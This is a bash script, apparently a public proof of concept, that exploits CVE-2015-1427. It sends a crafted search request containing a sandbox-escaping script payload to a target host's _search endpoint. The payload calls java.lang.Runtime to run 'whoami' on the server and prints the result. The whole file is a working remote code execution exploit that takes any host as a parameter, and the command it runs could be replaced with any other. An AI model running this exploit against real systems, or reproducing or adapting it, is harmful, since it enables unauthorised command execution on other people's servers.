#!/usr/bin/env bash
# CVE-2015-1427 exploit by t0kx
# https://github.com/t0kx/exploit-CVE-2015-1427

exploit() {
	printf "[+] Exploiting %s\n" ${HOST}
	printf "[+] Trigger Payload...\n"

	PAYLOAD=$(curl -s http://${HOST}/_search\?pretty \
		-XPOST -d '{
			"script_fields": {
				"myscript": {
					"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\").getText()"
				}
			}
		}' | grep "myscript" \
		| awk -F '\\[ "' '{print $2}' \
		| sed 's/\\n" ]//g')

	printf "[+] Running whoami: %s\n" ${PAYLOAD}
	printf "[+] Done\n"
}

main() {
	printf "[+] CVE-2015-1427 exploit by t0kx\n"

	if [ -z "${1}"  ]; then
		echo "[-] Please inform an host as parameter\n"
		exit -1
	else
		HOST=${1}
	fi

	exploit ${HOST}
}; main ${1}